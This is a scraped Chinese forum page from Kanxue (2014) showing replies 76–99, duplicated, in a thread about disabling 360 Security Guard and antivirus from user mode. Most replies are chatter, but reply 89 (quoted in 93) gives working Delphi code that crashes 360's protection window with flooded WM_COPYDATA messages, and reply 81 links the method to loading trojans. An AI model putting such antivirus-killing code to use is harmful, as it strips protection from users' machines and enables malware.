用户层废掉360安全卫士及杀毒软件-软件逆向-看雪-安全社区|安全招聘|kanxue.com

用户层废掉360安全卫士及杀毒软件

发表于: 2014-8-13 11:53 34068

用户层废掉360安全卫士及杀毒软件

Hoogle

2014-8-13 11:53

34068

查看主题内容

收藏・9

免费・0

支持

最新回复 (84) ◀ 1 2 3 4
无心问世雪币： 249 活跃值： (165) 能力值： ( LV2，RANK：10 ) 在线值：发帖 15 回帖 117 粉丝 0 关注私信	无心问世 76 楼求大牛给个链接，百度不到啊 2014-8-14 17:12 0
安于此生雪币： 2664 活跃值： (3401) 能力值： ( LV13，RANK：1760 ) 在线值：发帖 103 回帖 2020 粉丝 193 关注私信	安于此生 34 77 楼 http://bbs.pediy.com/showthread.php?t=175483&highlight=shim 之前有兄弟讨论过... 2014-8-14 17:16 0
gotmilk 雪币： 144 活跃值： (46) 能力值： ( LV6，RANK：90 ) 在线值：发帖 6 回帖 214 粉丝 1 关注私信	gotmilk 2 78 楼最讨厌这种懒得看 2014-8-14 20:27 0
sfjandsyj 雪币： 35 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 14 粉丝 0 关注私信	sfjandsyj 79 楼果然好东西，期待demo放出细细研究。 2014-8-14 20:29 0
freefree 雪币： 201 活跃值： (131) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 79 粉丝 0 关注私信	freefree 80 楼 N久不用杀毒软件了...... 2014-8-14 22:41 0
sforever 雪币： 2 活跃值： (52) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 9 粉丝 0 关注私信	sforever 81 楼楼主这样做我是非常支持的。他说明360并不是万能的，另外他透露可以用重启系统的方法干掉360，加载木马也可以用这种方法。楼主给了大家研究方向和信心。 2014-8-20 15:18 0
zoozkop 雪币： 190 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	zoozkop 82 楼哈哈，求来看看 2014-8-20 16:12 0
七杨雪币： 1 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 18 粉丝 0 关注私信	七杨 83 楼我只是围观。。。从不用360 2014-8-20 16:58 0
fhurricane 雪币： 492 活跃值： (53) 能力值： ( LV6，RANK：80 ) 在线值：发帖 36 回帖 270 粉丝 2 关注私信	fhurricane 1 84 楼样本在哪里？可以发一个么？ 2014-9-2 13:22 0
kangcin 雪币： 602 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 482 粉丝 0 关注私信	kangcin 85 楼看了视频，3个字，没意思，根据视频表现猜测，通过修改注册表或替换文件使360运行的时候加载该dll，dll在加载时候退出进程，没啥实用价值 2014-9-2 14:15 0
chishubiao 雪币： 11 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 33 粉丝 0 关注私信	chishubiao 86 楼哎大家来看帖都是来学东西或者找乐子的你这个既没有乐子我也没从中学到什么不过我还是很佩服楼主的勇气的 2014-9-14 17:29 0
wtxpwh 雪币： 48 活跃值： (491) 能力值： ( LV8，RANK：130 ) 在线值：发帖 39 回帖 327 粉丝 16 关注私信	wtxpwh 1 87 楼还是以前的那个漏洞？到现在还没有补？ 2014-9-14 17:48 0
pboy 雪币： 37 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 14 粉丝 0 关注私信	pboy 88 楼路过～看lz的方法也并不是只有360才有这个“问题”吧～也许其它防护软件同样有～重启后加载了你的那个DLL 360的各种exe都挂掉了当然启动不了了～ 2014-9-14 18:28 0
bestbird 雪币： 30050 活跃值： (2392) 能力值： ( LV3，RANK：20 ) 在线值：发帖 9 回帖 262 粉丝 20 关注私信	bestbird 89 楼方法多的很，例如下面这个（失效几个月了）： procedure Fuck359; const szOpcode: array[0..8] of Byte = ($83, $EC, $10, $56, $8D, $44, $24, $04, $50); //其实是查找窗口类名"Q360SafeMonClass" var hMod: THandle; dwGetHwndFun: DWORD; hWin: HWND; CopyData: COPYDATASTRUCT; lpNewBuf: array of Byte; i: integer; begin hMod := GetModuleHandle('safemon.dll'); if (hMod <> 0) then begin if (SerachOpcodeFromModule(hMod, PAnsiChar(@szOpcode[0]), sizeof(szOpcode), dwGetHwndFun)) then begin asm pushad; call dwGetHwndFun; mov hWin,eax; popad; end; SetLength(lpNewBuf, $1000); Randomize; while True do begin for i := 0 to $1000 - 1 do lpNewBuf[i] := Random(255); PDWORD(@lpNewBuf[0])^ := $4348534E; //这个标志很重要 CopyData.dwData := $4D47534D; //类型标示 CopyData.cbData := $1000; CopyData.lpData := @lpNewBuf[0]; SendMessage(hWin, WM_COPYDATA, 0, LPARAM(DWORD(@CopyData))); if (not IsWindow(hWin)) then begin MessageBox(0, 'Fuck xxx!', '', MB_ICONINFORMATION + MB_TOPMOST); Break; end; Sleep(1000); end; end else MessageBox(0, 'Not search opcode!', '', MB_ICONINFORMATION + MB_TOPMOST); end else MessageBox(0, 'Not found 359!', '', MB_ICONINFORMATION + MB_TOPMOST); end; 2014-9-15 17:58 0
hhxlovety 雪币： 69 活跃值： (40) 能力值： ( LV3，RANK：20 ) 在线值：发帖 11 回帖 61 粉丝 0 关注私信	hhxlovety 90 楼他帮助你什么了？录了个视频露了露就帮助到你了？ 2014-9-16 14:51 0
SnowNight 雪币： 8 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 78 粉丝 0 关注私信	SnowNight 91 楼那我觉得奇怪了，前不久论坛的ios吧主还不是弄了个破解ihone5锁屏的视频，怎么就看你们一大堆人说好，他同样没有放出代码，你们就不说他，我算明白了，所谓的趋炎附势！ 2014-10-23 15:06 0
guxing罗雪币： 36 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 128 粉丝 0 关注私信	guxing罗 92 楼求bin 2014-10-24 09:28 0
guxing罗雪币： 36 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 128 粉丝 0 关注私信	guxing罗 93 楼 [QUOTE=bestbird;1316790]方法多的很，例如下面这个（失效几个月了）： procedure Fuck359; const szOpcode: array[0..8] of Byte = ($83, $EC, $10, $56, $8D, $44, $24, $04, $50); //其实是查找窗口类名"Q360...[/QUOTE] 支持下这位兄弟 2014-10-24 09:31 0
知鱼之乐雪币： 9 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 65 粉丝 0 关注私信	知鱼之乐 94 楼帖子，我从头看到尾。楼主不就是分享了个自己研究的东西吗，不管这个是不是为了吸引眼球，至少这种分享精神是好的吗。为什么就有那么多人说不好呢？看雪论坛，不就是为了让大家交流吗，提倡分享吗？楼主刚开始不发 demo也是很正常的吗，毕竟这涉及到商业软件。现在怎么感觉这论坛就变味了，谁不是从菜鸟过来的。氛围比技术重要。希望坛主整肃一下纪律！ 2014-10-24 10:46 0
zzwlpx 雪币： 203 活跃值： (30) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	zzwlpx 95 楼演示视频怎么看不了 2014-11-11 15:00 0
落笔飞花雪币： 719 活跃值： (777) 能力值： ( LV8，RANK：120 ) 在线值：发帖 70 回帖 458 粉丝 61 关注私信	落笔飞花 1 96 楼挺好的。视频没有看。手机客户端你懂的。 2014-11-11 15:46 0
shijiheima 雪币： 166 活跃值： (232) 能力值： ( LV2，RANK：10 ) 在线值：发帖 10 回帖 58 粉丝 0 关注私信	shijiheima 97 楼强人啊！！！ 2015-11-27 20:05 0
千羽cherry 雪币： 223 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 16 粉丝 0 关注私信	千羽cherry 98 楼求样本看一看 2016-3-31 10:28 0
gaomingwei 雪币： 465 活跃值： (191) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 35 粉丝 0 关注私信	gaomingwei 99 楼没src没bin你说个jb 2016-7-8 17:27 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

Hoogle

发帖

118

回帖

RANK

关注

私信

他的文章

猎豹浏览器耍流氓在后台静默推广下载安装毒霸 8194

关于我们

联系我们

企业服务

看雪公众号

最新回复 (84) ◀ 1 2 3 4
无心问世雪币： 249 活跃值： (165) 能力值： ( LV2，RANK：10 ) 在线值：发帖 15 回帖 117 粉丝 0 关注私信	无心问世 76 楼求大牛给个链接，百度不到啊 2014-8-14 17:12 0
安于此生雪币： 2664 活跃值： (3401) 能力值： ( LV13，RANK：1760 ) 在线值：发帖 103 回帖 2020 粉丝 193 关注私信	安于此生 34 77 楼 http://bbs.pediy.com/showthread.php?t=175483&highlight=shim 之前有兄弟讨论过... 2014-8-14 17:16 0
gotmilk 雪币： 144 活跃值： (46) 能力值： ( LV6，RANK：90 ) 在线值：发帖 6 回帖 214 粉丝 1 关注私信	gotmilk 2 78 楼最讨厌这种懒得看 2014-8-14 20:27 0
sfjandsyj 雪币： 35 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 14 粉丝 0 关注私信	sfjandsyj 79 楼果然好东西，期待demo放出细细研究。 2014-8-14 20:29 0
freefree 雪币： 201 活跃值： (131) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 79 粉丝 0 关注私信	freefree 80 楼 N久不用杀毒软件了...... 2014-8-14 22:41 0
sforever 雪币： 2 活跃值： (52) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 9 粉丝 0 关注私信	sforever 81 楼楼主这样做我是非常支持的。他说明360并不是万能的，另外他透露可以用重启系统的方法干掉360，加载木马也可以用这种方法。楼主给了大家研究方向和信心。 2014-8-20 15:18 0
zoozkop 雪币： 190 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	zoozkop 82 楼哈哈，求来看看 2014-8-20 16:12 0
七杨雪币： 1 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 18 粉丝 0 关注私信	七杨 83 楼我只是围观。。。从不用360 2014-8-20 16:58 0
fhurricane 雪币： 492 活跃值： (53) 能力值： ( LV6，RANK：80 ) 在线值：发帖 36 回帖 270 粉丝 2 关注私信	fhurricane 1 84 楼样本在哪里？可以发一个么？ 2014-9-2 13:22 0
kangcin 雪币： 602 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 482 粉丝 0 关注私信	kangcin 85 楼看了视频，3个字，没意思，根据视频表现猜测，通过修改注册表或替换文件使360运行的时候加载该dll，dll在加载时候退出进程，没啥实用价值 2014-9-2 14:15 0
chishubiao 雪币： 11 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 33 粉丝 0 关注私信	chishubiao 86 楼哎大家来看帖都是来学东西或者找乐子的你这个既没有乐子我也没从中学到什么不过我还是很佩服楼主的勇气的 2014-9-14 17:29 0
wtxpwh 雪币： 48 活跃值： (491) 能力值： ( LV8，RANK：130 ) 在线值：发帖 39 回帖 327 粉丝 16 关注私信	wtxpwh 1 87 楼还是以前的那个漏洞？到现在还没有补？ 2014-9-14 17:48 0
pboy 雪币： 37 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 14 粉丝 0 关注私信	pboy 88 楼路过～看lz的方法也并不是只有360才有这个“问题”吧～也许其它防护软件同样有～重启后加载了你的那个DLL 360的各种exe都挂掉了当然启动不了了～ 2014-9-14 18:28 0
bestbird 雪币： 30050 活跃值： (2392) 能力值： ( LV3，RANK：20 ) 在线值：发帖 9 回帖 262 粉丝 20 关注私信	bestbird 89 楼方法多的很，例如下面这个（失效几个月了）： procedure Fuck359; const szOpcode: array[0..8] of Byte = ($83, $EC, $10, $56, $8D, $44, $24, $04, $50); //其实是查找窗口类名"Q360SafeMonClass" var hMod: THandle; dwGetHwndFun: DWORD; hWin: HWND; CopyData: COPYDATASTRUCT; lpNewBuf: array of Byte; i: integer; begin hMod := GetModuleHandle('safemon.dll'); if (hMod <> 0) then begin if (SerachOpcodeFromModule(hMod, PAnsiChar(@szOpcode[0]), sizeof(szOpcode), dwGetHwndFun)) then begin asm pushad; call dwGetHwndFun; mov hWin,eax; popad; end; SetLength(lpNewBuf, $1000); Randomize; while True do begin for i := 0 to $1000 - 1 do lpNewBuf[i] := Random(255); PDWORD(@lpNewBuf[0])^ := $4348534E; //这个标志很重要 CopyData.dwData := $4D47534D; //类型标示 CopyData.cbData := $1000; CopyData.lpData := @lpNewBuf[0]; SendMessage(hWin, WM_COPYDATA, 0, LPARAM(DWORD(@CopyData))); if (not IsWindow(hWin)) then begin MessageBox(0, 'Fuck xxx!', '', MB_ICONINFORMATION + MB_TOPMOST); Break; end; Sleep(1000); end; end else MessageBox(0, 'Not search opcode!', '', MB_ICONINFORMATION + MB_TOPMOST); end else MessageBox(0, 'Not found 359!', '', MB_ICONINFORMATION + MB_TOPMOST); end; 2014-9-15 17:58 0
hhxlovety 雪币： 69 活跃值： (40) 能力值： ( LV3，RANK：20 ) 在线值：发帖 11 回帖 61 粉丝 0 关注私信	hhxlovety 90 楼他帮助你什么了？录了个视频露了露就帮助到你了？ 2014-9-16 14:51 0
SnowNight 雪币： 8 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 78 粉丝 0 关注私信	SnowNight 91 楼那我觉得奇怪了，前不久论坛的ios吧主还不是弄了个破解ihone5锁屏的视频，怎么就看你们一大堆人说好，他同样没有放出代码，你们就不说他，我算明白了，所谓的趋炎附势！ 2014-10-23 15:06 0
guxing罗雪币： 36 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 128 粉丝 0 关注私信	guxing罗 92 楼求bin 2014-10-24 09:28 0
guxing罗雪币： 36 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 128 粉丝 0 关注私信	guxing罗 93 楼 [QUOTE=bestbird;1316790]方法多的很，例如下面这个（失效几个月了）： procedure Fuck359; const szOpcode: array[0..8] of Byte = ($83, $EC, $10, $56, $8D, $44, $24, $04, $50); //其实是查找窗口类名"Q360...[/QUOTE] 支持下这位兄弟 2014-10-24 09:31 0
知鱼之乐雪币： 9 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 65 粉丝 0 关注私信	知鱼之乐 94 楼帖子，我从头看到尾。楼主不就是分享了个自己研究的东西吗，不管这个是不是为了吸引眼球，至少这种分享精神是好的吗。为什么就有那么多人说不好呢？看雪论坛，不就是为了让大家交流吗，提倡分享吗？楼主刚开始不发 demo也是很正常的吗，毕竟这涉及到商业软件。现在怎么感觉这论坛就变味了，谁不是从菜鸟过来的。氛围比技术重要。希望坛主整肃一下纪律！ 2014-10-24 10:46 0
zzwlpx 雪币： 203 活跃值： (30) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	zzwlpx 95 楼演示视频怎么看不了 2014-11-11 15:00 0
落笔飞花雪币： 719 活跃值： (777) 能力值： ( LV8，RANK：120 ) 在线值：发帖 70 回帖 458 粉丝 61 关注私信	落笔飞花 1 96 楼挺好的。视频没有看。手机客户端你懂的。 2014-11-11 15:46 0
shijiheima 雪币： 166 活跃值： (232) 能力值： ( LV2，RANK：10 ) 在线值：发帖 10 回帖 58 粉丝 0 关注私信	shijiheima 97 楼强人啊！！！ 2015-11-27 20:05 0
千羽cherry 雪币： 223 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 16 粉丝 0 关注私信	千羽cherry 98 楼求样本看一看 2016-3-31 10:28 0
gaomingwei 雪币： 465 活跃值： (191) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 35 粉丝 0 关注私信	gaomingwei 99 楼没src没bin你说个jb 2016-7-8 17:27 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复